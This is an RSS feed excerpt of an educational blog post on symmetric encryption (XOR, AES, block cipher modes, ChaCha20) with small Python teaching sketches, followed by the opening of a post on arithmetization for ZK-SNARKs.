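&lt;p&gt;Since encryption is an XOR with a keystream derived only from the key, applying the same operation again recovers the plaintext, which is exactly the relation \( D(E(P,k),k)=P \) above.&lt;&#x2F;p&gt;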
&lt;p&gt;We want certain properties from our encryption algorithm and the output ciphertext. First, the ciphertext should appear as random text with no clear patterns. We would also like that, if we change even a single bit of the message, the resulting ciphertext is utterly different from the original one: we call this the avalanche effect.&lt;&#x2F;p&gt;
&lt;p&gt;These are related to two properties that a secure cipher should have: confusion and diffusion. Confusion serves to hide the relationship between the key and the ciphertext. Diffusion means that each bit of the ciphertext depends on many bits of the plaintext; equivalently, if we changed one bit of the plaintext, we would expect many ciphertext bits to change their values, which is the avalanche effect.&lt;&#x2F;p&gt;
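&lt;p&gt;The avalanche effect is easy to observe empirically. The sketch below uses SHA-256 as a stand-in for a cipher’s output (an illustration only): flipping a single input bit changes, on average, about half of the 256 output bits:&lt;&#x2F;p&gt;

```python
# Observing the avalanche effect, using SHA-256 as a stand-in (illustration only).
import hashlib

def hamming(a: bytes, b: bytes) -> int:
    # Number of differing bits between two equal-length byte strings
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

def avalanche(m1: bytes, m2: bytes) -> int:
    # How many of the 256 output bits flip when the input changes
    return hamming(hashlib.sha256(m1).digest(), hashlib.sha256(m2).digest())
```

&lt;p&gt;For instance, the inputs &quot;hello world&quot; and &quot;hello worle&quot; differ in a single bit, yet their hashes differ in roughly half of their bits.&lt;&#x2F;p&gt;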
&lt;p&gt;A cipher’s permutation should satisfy the following three conditions to be secure:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The key should determine the permutation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Different keys should give rise to different permutations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The permutations should look random.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first condition guarantees that we need the key to be able to decrypt. If the key does not determine the permutations, it plays no role in the process, and anyone could decrypt things without it. The second one means that no two keys yield the same permutation. If it were so, then we could decrypt the messages encrypted with one key with another, and that would make it easier to break the cryptosystem. The third one implies that we should not be able to learn anything about the plaintext from the ciphertext (an example where this fails is on some bitmaps with ECB mode encryption).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;information-versus-computational-security&quot;&gt;Information-theoretic versus computational security&lt;&#x2F;h2&gt;
&lt;p&gt;One important point concerns the security proofs of our cryptographic schemes. In some cases, one can prove that specific methods are mathematically secure even if the attacker has unbounded computational power. These schemes are known as information-theoretically secure. However, to build practical cryptographic schemes, we need to introduce some assumptions. Modern cryptographic algorithms can be proven computationally secure: the adversary has bounded computing power and can break the system only by spending an infeasible amount of time or resources, even with the fastest and most powerful devices available today.&lt;&#x2F;p&gt;
&lt;p&gt;Instead of perfect security, computational security relies on the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Security is preserved only against efficient adversaries.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Adversaries can succeed, but only with negligible probability.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We can consider our schemes secure for practical purposes if we have sufficiently reasonable bounds for computational power and the probability of success is small enough.&lt;&#x2F;p&gt;
&lt;p&gt;There are two common approaches to analyzing the security of our cryptographic protocols:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Concrete.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Asymptotic.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In the concrete case, we bound the probability of success, \( \epsilon \), after the attacker has spent time \(t \). We say that the scheme is \( (t,\epsilon) \)-secure if an adversary spending time \(t \) has a probability of success of at most \( \epsilon \).&lt;&#x2F;p&gt;
&lt;p&gt;The asymptotic approach is related to complexity theory. It views the running time of the attacker and his success probability as functions of a security parameter, \( \lambda \) (for example, the secret key size). It only guarantees security provided \( \lambda \) is sufficiently large.&lt;&#x2F;p&gt;
&lt;p&gt;We say an algorithm is efficient if its running time is polynomial in \( \lambda \), that is, at most \( c_1 \lambda^{c_2} \) for some constants \( c_1 \) and \( c_2 \). We can also write this in big O notation as \( O(\lambda^{c_2}) \).&lt;&#x2F;p&gt;
&lt;p&gt;As for the probability of success, we consider it small if it is smaller than any inverse polynomial in \( \lambda \). More precisely, for every constant \( c \), the attacker’s success probability is (for sufficiently large \( \lambda \)) smaller than the inverse polynomial \( \lambda^{-c} \). A function that vanishes faster than any inverse polynomial is called negligible.&lt;&#x2F;p&gt;
&lt;p&gt;A scheme is secure if every probabilistic, polynomial-time attacker succeeds in breaking it with only negligible probability.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;bit-operations-exclusive-or-xor&quot;&gt;Bit operations: exclusive OR (XOR)&lt;&#x2F;h2&gt;
&lt;p&gt;One operation frequently used in cryptography is the exclusive OR operator (XOR). It is a binary operation, taking two bits and outputting another; we will represent the operation with the \( \oplus \) symbol. Its truth table is:&lt;br &#x2F;&gt;
\( 0\oplus 0=0\)&lt;br &#x2F;&gt;
\( 0\oplus 1=1\)&lt;br &#x2F;&gt;
\( 1\oplus 0=1\)&lt;br &#x2F;&gt;
\( 1\oplus 1=0\)&lt;&#x2F;p&gt;
&lt;p&gt;We can also view the XOR operation as an addition modulo \( 2 \):&lt;br &#x2F;&gt;
\( 0+0\equiv 0 \pmod{2}\)&lt;br &#x2F;&gt;
\( 1+0\equiv 1 \pmod{2}\)&lt;br &#x2F;&gt;
\( 1+1\equiv 0 \pmod{2}\)&lt;br &#x2F;&gt;
These results are expected: the sum of two odd or two even numbers is always even, whereas the sum of an odd and an even number is always odd.&lt;&#x2F;p&gt;
&lt;p&gt;Why is this operation helpful? Suppose we want to encrypt a message given as a sequence of bits. One way to encrypt it is to generate a sequence of (pseudo)random bits and XOR each message bit with the corresponding random bit to get the ciphertext. An attacker trying to decipher the text runs into the following problem:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * If he sees \\( 0 \\) in the ciphertext, it could be because the plaintext had \\( 1 \\) and the random bit was also \\( 1 \\), or both were zero. So, he has a \\( 50 % \\) chance of guessing correctly!&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * If he sees \\( 1 \\) in the ciphertext, either the plaintext is \\(1 \\) and the random bit is \\( 0 \\) or the other way round. Again, he has a \\( 50 % \\) chance of guessing correctly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If the message is composed of several bytes (for example, 16 bytes - 128 bits), the probability of guessing the correct message is \( 3\times 10^{-39} \)!&lt;&#x2F;p&gt;
&lt;p&gt;We see that the XOR operation is hard to reverse unless we know one of the original inputs. In that case, if \( c=m\oplus r\), then&lt;br &#x2F;&gt;
\[ m=c\oplus r\]&lt;&#x2F;p&gt;
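&lt;p&gt;As a quick illustration, here is a minimal Python sketch of this XOR construction (the variable names are ours, and &lt;code&gt;os.urandom&lt;&#x2F;code&gt; stands in for a proper keystream generator): XORing with the keystream encrypts, and XORing again recovers the message.&lt;&#x2F;p&gt;

```python
import os

def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings element-wise."""
    return bytes(x ^ y for x, y in zip(a, b))

message = b"attack at dawn"
keystream = os.urandom(len(message))  # one (pseudo)random byte per message byte

ciphertext = xor_bytes(message, keystream)  # c = m XOR r
recovered = xor_bytes(ciphertext, keystream)  # m = c XOR r, same operation

assert recovered == message
```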
&lt;h2 id=&quot;stream-and-block-ciphers&quot;&gt;Stream and Block ciphers&lt;&#x2F;h2&gt;
&lt;p&gt;A block cipher takes a message of fixed length (128 bits, for example) and encrypts it by applying a key-dependent permutation to the whole block. Two values characterize a block cipher: the block size (for example, 16 bytes, that is, 128 bits) and the key size. Both determine the level of security of the cipher. The cipher does not operate on individual bits but on fixed-size blocks.&lt;&#x2F;p&gt;
&lt;p&gt;Block sizes should be neither very large nor very small. If blocks are too large, the memory footprint and ciphertext length grow, hurting the cost and performance of encryption. If the block size is too small, the cipher becomes susceptible to codebook attacks.&lt;&#x2F;p&gt;
&lt;p&gt;In practice, a block cipher is the repetitive application of permutation and substitution steps; these take place in rounds. The main building blocks are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Substitution boxes (S-boxes).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Mixing permutations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Key schedule.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If we call \(f_k \) the function corresponding to round \( k \), the ciphertext is&lt;br &#x2F;&gt;
\[ C= f_n(f_{n-1}(\dots f_2(f_1(P))))\]&lt;&#x2F;p&gt;
&lt;p&gt;The round functions have the same operations but are parametrized by a different key (which leads to other substitutions and permutations). We should not use the same key for all steps; otherwise, our cryptosystem can be vulnerable to slide attacks.&lt;&#x2F;p&gt;
&lt;p&gt;Decryption is the successive application of the inverse functions \( g_k=f_k^{-1}\),&lt;br &#x2F;&gt;
\[ P=g_1(g_2(\dots g_{n-1}(g_n(C))))\]&lt;&#x2F;p&gt;
&lt;p&gt;Stream ciphers work very differently; instead of combining blocks of text and the key, they deterministically generate a sequence of “random” bits (called the keystream) from the key and perform XOR operations with the text.&lt;&#x2F;p&gt;
&lt;p&gt;The keystream, \( KS \), is derived from the secret key \( k \) and a public nonce \( \mathrm{nonce} \). If we have our message, \( \mathrm{m} \) to encrypt we perform \( C=KS \oplus \mathrm{m} \). To decrypt, we simply XOR again, \( \mathrm{m}=KS\oplus C\). We can easily see that the encrypt and decrypt operations are essentially the same; we only need the keystream to be able to do it. It is important that \( \mathrm{nonce} \), which need not be secret, is never reused. To see why, suppose we have two messages \( \mathrm{m}_1 \) and \( \mathrm{m}_2\), and their corresponding ciphertexts, which have been encrypted using the same key \( k \) and \( \mathrm{nonce} \). We can recover the message \( \mathrm{m}_1 \) using the following operation:&lt;br &#x2F;&gt;
\[ \mathrm{m}_1=C_2\oplus C_1 \oplus \mathrm{m}_2 \]&lt;&#x2F;p&gt;
&lt;p&gt;This was an actual implementation error in Microsoft Excel and Word: they reused the same nonce, which meant the messages could be decrypted whenever two versions of the same file were available.&lt;&#x2F;p&gt;
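&lt;p&gt;The nonce-reuse attack is easy to reproduce. In this illustrative Python sketch (the fixed keystream and the messages are made up for the example), the shared keystream cancels out, so knowing one plaintext reveals the other.&lt;&#x2F;p&gt;

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in for a keystream derived from (k, nonce); reusing it is the bug.
keystream = bytes(range(16))

m1 = b"transfer $100  !"
m2 = b"meeting at noon!"
c1 = xor_bytes(m1, keystream)
c2 = xor_bytes(m2, keystream)

# The keystream cancels: c1 XOR c2 = m1 XOR m2, so knowing m2 reveals m1.
recovered_m1 = xor_bytes(xor_bytes(c1, c2), m2)
assert recovered_m1 == m1
```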
&lt;h2 id=&quot;encryption-algorithms&quot;&gt;Encryption algorithms&lt;&#x2F;h2&gt;
&lt;p&gt;In the following sections, we will cover the basics of each type of cipher by analyzing two commonly used ones: AES (a block cipher), the most widely used cipher nowadays, and ChaCha (a stream cipher), commonly used on Android systems in the form of ChaCha20-Poly1305.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;aes&quot;&gt;AES&lt;&#x2F;h2&gt;
&lt;p&gt;The Advanced Encryption Standard (AES) resulted from an open competition organized by NIST in 1997 that lasted for three years. The proposal by Rijmen and Daemen was selected as the winner and was standardized by NIST in 2001. We implemented AES and its arithmetization for use in zero-knowledge proofs &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;AES_zero_knowledge_proof_circuit&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;AES offers three levels of security: AES-128, AES-192, and AES-256, with key sizes of 16, 24, and 32 bytes, respectively. As the key’s size increases, so does security. However, for most applications, AES-128 provides sufficient security levels (the best-known attacks against AES are only slightly better than brute-force attacks, which would require \( 2^{128} \) operations).&lt;&#x2F;p&gt;
&lt;p&gt;AES is a block cipher: it takes a 16-byte block (128 bits) and the variable-length key and outputs a 16-byte ciphertext. If the text has fewer than 16 bytes, it is conveniently padded. After decryption, it should be possible to remove the padding to recover the message; therefore, we cannot use random padding, since we could not distinguish the original message from the random bits.&lt;&#x2F;p&gt;
&lt;p&gt;Remember that block ciphers are permutations: they map the set of all possible plaintext blocks bijectively onto the set of all possible ciphertext blocks.&lt;&#x2F;p&gt;
&lt;p&gt;The cipher sees the plaintext as a \( 4\times 4 \) matrix of bytes. AES has a round function, which is applied several times to the plaintext, scrambling and mixing everything well until we obtain the ciphertext. Each round uses a different key (generated deterministically from the secret key), so that the slightest change in the bits of the secret key results in an entirely different encryption. The steps in each round function (except the last one) are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * SubBytes&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * ShiftRows&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * MixColumns&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * AddRoundKey&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The first three are easily reversible, but the last one is not: it performs an XOR operation between the text and the round key. However, all the steps are necessary to achieve the desired security levels.&lt;&#x2F;p&gt;
&lt;p&gt;AES-128 uses ten rounds to perform encryption (AES-192 and AES-256 use 12 and 14, respectively). Every round contains the four operations, except for an initial whitening step (only the round key is added) and the final round (MixColumns is omitted).&lt;&#x2F;p&gt;
&lt;p&gt;SubBytes (also called the substitution box, or S-box) provides the substitution step and is the nonlinear part of the cipher. Since it operates on one byte at a time, the substitution can be implemented with a 256-entry lookup table.&lt;&#x2F;p&gt;
&lt;p&gt;In ShiftRows, the bytes within each row are rotated; in MixColumns, the bytes within each column are mixed by a linear transformation.&lt;&#x2F;p&gt;
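&lt;p&gt;To make the byte movement concrete, here is an illustrative Python sketch of ShiftRows only (row \( i \) of the state is rotated left by \( i \) positions); the MixColumns linear transformation over \( GF(2^8) \) and the other AES steps are omitted.&lt;&#x2F;p&gt;

```python
def shift_rows(state):
    """AES ShiftRows: row i of the 4x4 state is rotated left by i positions."""
    return [row[i:] + row[:i] for i, row in enumerate(state)]

# Toy 4x4 state filled with byte indices so the movement is easy to follow.
state = [
    [0, 1, 2, 3],
    [4, 5, 6, 7],
    [8, 9, 10, 11],
    [12, 13, 14, 15],
]
shifted = shift_rows(state)

assert shifted[0] == [0, 1, 2, 3]      # row 0 is left unchanged
assert shifted[1] == [5, 6, 7, 4]      # row 1 rotated left by one
assert shifted[3] == [15, 12, 13, 14]  # row 3 rotated left by three
```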
&lt;p&gt;The key schedule function is called to generate the keys for each round: all the round keys are derived from the secret key using the substitution boxes and XOR operations. One drawback of this key schedule is that if an attacker learns one of the round keys, he can run the schedule backward and recover all the other keys, including the secret key.&lt;&#x2F;p&gt;
&lt;p&gt;Why do we need all these operations to have a secure cipher?&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The MixColumns and ShiftRows guarantee that all the elements are &amp;quot;well mixed&amp;quot;. If one of them is missing, then we could break the cipher into smaller blocks and perform a codebook search over \\( 2^{32} \\) possibilities, which is far better than \\( 2^{128} \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * SubBytes gives the nonlinear part to the cipher. Without it, all the operations are linear and easier to reverse.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * AddRoundKey makes the ciphertext depend on the key. If we skip this step, we don&amp;#39;t need any key to decipher.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The key schedule prevents us from reusing the same key all the time, making the cipher vulnerable to slide attacks.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;When we want to encrypt a message bigger than the block size, we can divide it into blocks of 16 bytes and pad the last one, if necessary. This simple approach is known as the electronic codebook mode (ECB) and should not be used. As encryption is deterministic, we will get the same ciphertext every time we encrypt a given plaintext. This is problematic when we have, for example, an image with repetitive patterns or large areas of one color since the ciphertext will exhibit those patterns too. There are several modes that we can use to avoid this problem:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Cipher block chaining (CBC)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Propagating cipher block chaining (PCBC)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Cipher Feedback (CFB)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Output feedback (OFB)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Counter (CTR)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For example, in the CBC mode:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Initialize a 16-byte random vector (IV),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Perform \\( \tilde{B}_1=IV \oplus B_1 \\), where \\( B_1 \\) is the first block and set \\( k=1 \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Use AES to encrypt \\( E_1= \tilde{B}_1 \\).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Perform \\( \tilde{B_{k+1}}=E_k \oplus B_{k+1} \\)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Use AES to encrypt \\( E_{k+1}= \tilde{B_{k+1}} \\) and do \\( k=k+1 \\)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. If \\( k \neq k_{max} \\), go to step 4. Otherwise, it is the end of the encryption.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The IV guarantees that the resulting ciphertext will be different even if the same plaintext is encrypted.&lt;&#x2F;p&gt;
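&lt;p&gt;The CBC chaining steps above can be sketched in a few lines of Python. Note that &lt;code&gt;toy_block_encrypt&lt;&#x2F;code&gt; below is a made-up, insecure placeholder standing in for AES, and padding is omitted; the point is only to show how each block is XORed with the previous ciphertext block before encryption.&lt;&#x2F;p&gt;

```python
import os

BLOCK = 16

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def toy_block_encrypt(block: bytes, key: bytes) -> bytes:
    # Placeholder keyed permutation standing in for AES; NOT secure.
    return bytes((b + k) % 256 for b, k in zip(block, key))

def toy_block_decrypt(block: bytes, key: bytes) -> bytes:
    return bytes((b - k) % 256 for b, k in zip(block, key))

def cbc_encrypt(plaintext: bytes, key: bytes, iv: bytes) -> bytes:
    blocks = [plaintext[i:i + BLOCK] for i in range(0, len(plaintext), BLOCK)]
    prev, out = iv, []
    for b in blocks:
        prev = toy_block_encrypt(xor_bytes(b, prev), key)  # chain ciphertexts
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    prev, out = iv, []
    for b in blocks:
        out.append(xor_bytes(toy_block_decrypt(b, key), prev))
        prev = b
    return b"".join(out)

key = bytes(range(BLOCK))
iv = os.urandom(BLOCK)                    # random IV, fresh per message
msg = b"A" * 32                           # two identical 16-byte blocks
ct = cbc_encrypt(msg, key, iv)

assert cbc_decrypt(ct, key, iv) == msg
# Unlike ECB, identical plaintext blocks yield different ciphertext blocks.
assert ct[:BLOCK] != ct[BLOCK:2 * BLOCK]
```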
&lt;p&gt;Another problem we face is that, even though the message has been encrypted, we cannot know whether an attacker has modified it. To prevent modification of the ciphertext, we can add message authentication codes (MAC), which we will cover in another post.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;chacha20&quot;&gt;ChaCha20&lt;&#x2F;h2&gt;
&lt;p&gt;ChaCha20 is a modification of the Salsa20 cipher, invented by Daniel J. Bernstein in 2005. Its working principle is the same as all stream ciphers: it generates a keystream from the secret key and encrypts by performing an XOR operation between the plaintext and the keystream.&lt;&#x2F;p&gt;
&lt;p&gt;ChaCha20 generates the keystream by repeatedly calling a block function that outputs 64 bytes of keystream. It takes as input:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 256-bit key.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 96-bit nonce.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * 32-bit counter.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Every time the function outputs 64 bytes of keystream, the counter is increased by one; the process continues until the keystream is at least as long as the plaintext. Then we truncate it to the plaintext length and perform the XOR operation. The maximum size we can encrypt is given by the number of counter values, \( 2^{32} \), times the output of each call, 64 bytes, yielding a maximum of \( 2^{32}\times 64 \) bytes, or 256 GB.&lt;&#x2F;p&gt;
&lt;p&gt;The core operation is the Quarter Round. It takes four 32-bit unsigned integers, denoted \( a,b,c \), and \( d \), and performs the following operations:&lt;br &#x2F;&gt;
\( a=a+b;\space d=d\oplus a;\space d&amp;lt;&amp;lt;&amp;lt;16\)&lt;br &#x2F;&gt;
\( c=c+d;\space b=b\oplus c;\space b&amp;lt;&amp;lt;&amp;lt;12\)&lt;br &#x2F;&gt;
\( a=a+b;\space d=d\oplus a;\space d&amp;lt;&amp;lt;&amp;lt;8\)&lt;br &#x2F;&gt;
\( c=c+d;\space b=b\oplus c;\space b&amp;lt;&amp;lt;&amp;lt;7\)&lt;br &#x2F;&gt;
where \( &amp;lt;&amp;lt;&amp;lt;n \) denotes an \( n \)-bit rotation towards the left.&lt;&#x2F;p&gt;
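&lt;p&gt;The quarter round translates directly into code. The following Python sketch implements the four lines above and checks them against the test vector from RFC 8439, section 2.1.1.&lt;&#x2F;p&gt;

```python
MASK = 0xFFFFFFFF  # keep everything in 32-bit unsigned arithmetic

def rotl32(x: int, n: int) -> int:
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & MASK

def quarter_round(a: int, b: int, c: int, d: int):
    a = (a + b) & MASK; d = rotl32(d ^ a, 16)
    c = (c + d) & MASK; b = rotl32(b ^ c, 12)
    a = (a + b) & MASK; d = rotl32(d ^ a, 8)
    c = (c + d) & MASK; b = rotl32(b ^ c, 7)
    return a, b, c, d

# Test vector from RFC 8439, section 2.1.1.
a, b, c, d = quarter_round(0x11111111, 0x01020304, 0x9b8d6f43, 0x01234567)
assert (a, b, c, d) == (0xea2a92f4, 0xcb1cf8ce, 0x4581472e, 0x5881c4bb)
```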
&lt;p&gt;The ChaCha state comprises 16 32-bit words: the first four are constants; the next eight correspond to the key, followed by one word for the counter and three for the nonce.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Symmetric encryption is one of the most widely used encryption schemes nowadays; it also provides tools upon which we can build hash functions. We can classify symmetric ciphers into two big groups: block ciphers (like AES) and stream ciphers (like ChaCha20). Both provide confidentiality by scrambling and substituting the message. In a subsequent post, we will deal with how parties can agree on a key over an insecure channel.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Arithmetization schemes for ZK-SNARKs</title>
          <pubDate>Sat, 14 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/arithmetization-schemes-for-zk-snarks/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/arithmetization-schemes-for-zk-snarks/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/arithmetization-schemes-for-zk-snarks/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Zero-knowledge proofs (ZKP) are gaining ground thanks to their many applications in delegating computations to untrusted servers and solving the scalability issues that decentralized ledgers suffer from. ZKP allow us to prove a given computation’s validity without revealing sensitive data. One of the key advantages is that the proof is short (succinct), and its verification time is much faster than the naïve re-execution of the computation. We can exploit this in decentralized ledgers, where each node must check the correctness of the transactions. Here, the weakest devices act as bottlenecks. If we can now verify the validity of a transaction by checking a small proof (taking a few milliseconds), then the scalability problems begin to fade away. We can also make proofs showing that we executed thousands of transactions or operations by using recursive proof composition, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;proof-aggregation-schemes-snarkpack-and-aplonk&#x2F;&quot;&gt;proof aggregation&lt;&#x2F;a&gt;, or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;folding schemes&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;To prove the validity of the computation and avoid revealing sensitive information, ZKP rely on polynomials and their properties. Polynomials are expressions of the form \( a_0+a_1x+a_2x^2+a_3x^3+\dots+a_n x^n \), where the coefficients \( a_k \) are elements of some &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;ring or field&lt;&#x2F;a&gt; (for example, integers, real numbers or members of a finite field, like \( \mathbb{Z}&#x2F;7\mathbb{Z}\), the integers modulo 7). Now, to be able to use polynomials, we must first express our computations in terms of them through a process known as arithmetization.&lt;&#x2F;p&gt;
&lt;p&gt;Arithmetization reduces computational statements to algebraic statements involving polynomials of a bounded degree. Arithmetization can be divided into two categories:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Circuit computations. Most SNARKs use this.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
